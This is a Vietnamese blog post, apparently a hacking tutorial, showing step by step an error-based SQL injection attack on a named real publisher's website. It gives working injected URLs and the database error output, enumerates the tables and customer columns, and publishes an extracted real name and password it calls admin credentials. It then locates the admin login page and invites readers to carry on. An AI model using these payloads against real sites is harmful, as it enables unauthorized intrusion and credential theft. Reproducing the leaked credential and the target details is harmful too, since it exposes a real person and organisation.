TUT Hack web lỗi sql chi tiết

Ngồi learn get root oải quá lang thang tự nhiên lòi ra thằng này . Nhìn nó nghi nghi thế là check SQL thử - Hi.c cái này bình thường ko có gì bà con đừng có chửi nha
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074'
thêm đại dấu ' vô . he biết ngay mà nhìn đã thấy nghi rồi
Code:
   
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/SCart/cart.asp, line 76
Hí làm gì giờ nhỉ thử lấy column xem nào ^.^
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.columns%20where%20table_name%20not%20in%20(%20'')))--sp_password
được gì thế này
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Address' to a column of data type int.

/SCart/cart.asp, line 76
thế là lòi ra rồi he he . tiếp tục query ta được một đống sau
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.columns%20where%20table_name%20not%20in%20(%20'Address','AlsoPurchased','Authors','BEGInventory','BEGPayables','BEGReceivables','BEGReceivables','Books','Categories','Contacts','Customers','DiscountRate','NewsTopics','NewsSources','Orders','PayablesTrack','PaymentType','ReceivablesTrack','SachDBchuaTG','SachDBcoTG','Sales','Search','Session','Settings','Stores','sysconstraints','syssegments','TaxRate','Test','dtproperties','Employees','Inventory','InventoryDetails','InventoryTrack','ItemAuthor','ItemAuthorKeyword','ItemCategory','Items','ItemSubjectKeyword','ItemSubjectKeyword','ItemTitleKeyword','ItemType','ItemWineryKeyword','Keywords','News','TheLoaiSach','TransactionDetails','vwAccounts','Wineries','Wines')))--sp_password
Nhìn cái vwAccounts thấy nghi nghi nhưng hok có pass admin T.T Hóa ra nó nằm ở Customers
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='customers'%20AND%20column_name%20not%20in%20('PKId','Alias','Password','CustomerName','AddressId','Email','LastSale','TotalSaleYTD','Balance','Category','CreditRating','CreditLimit')))--sp_password
Cứ từ từ mà soi là ta lại được những table kia ^.^ Customname kìa hihi Password kìa ^.^
thế mà làm mình soi cái này mới ức chứ
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Orders'%20AND%20column_name%20not%20in%20('PKId','CustomerId','EmployeeId','OtherStoreId','StoreId','SupplierId','OrderType','OrderStatus','OrderDate','PickupDate','ShippingHandling','ShipToName',%20'ShipToAddressId')))--sp_password
hè hè bây giờ ta lấy password thôi
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%2%convert(int,(select  top 1 CustomerName%2b'/'%2bPassword from Customers))--sp_password
Hè hè ra Đào Ngọc Đạt/NgocDat là name và pass của admin >Sướng nhá . Nhưng mà vẫn chưa thấy link login đâu cả . Lười check thôi thì đoán vậy
login không phải , thử nguoiquantri không phải . Khôpng biết Admin có để link login vô ko nhỉ . Đang chán thế nào tay lại đánh thêm vào url dòng admin thế là nó lòi ngay ra . Hic kể ra cũng có lúc ngu thật
Code:
http://www.nxbctqg.org.vn/admin
Ô nhưng sao thế này nó đòi ID để login T.T Thử đại cái usename Đào Ngọc Đạt không được hehe lại phải đi soi típ rùi . Nhưng mà đói rùi anh em vô check nha thế mới vui ^.^ Đi ăn cơm cái đã . Chú ý mấy cái table có ID đằng sau anh em nha .
The end : Đã báo admin . Không phá hoại gì . Lạy chúa tha tội con thờ Phật cơ T.T


TUT Hack web lỗi sql chi tiết TUT Hack web lỗi sql chi tiết Reviewed by tiền hình con khỉ on 03:21 Rating: 5

Không có nhận xét nào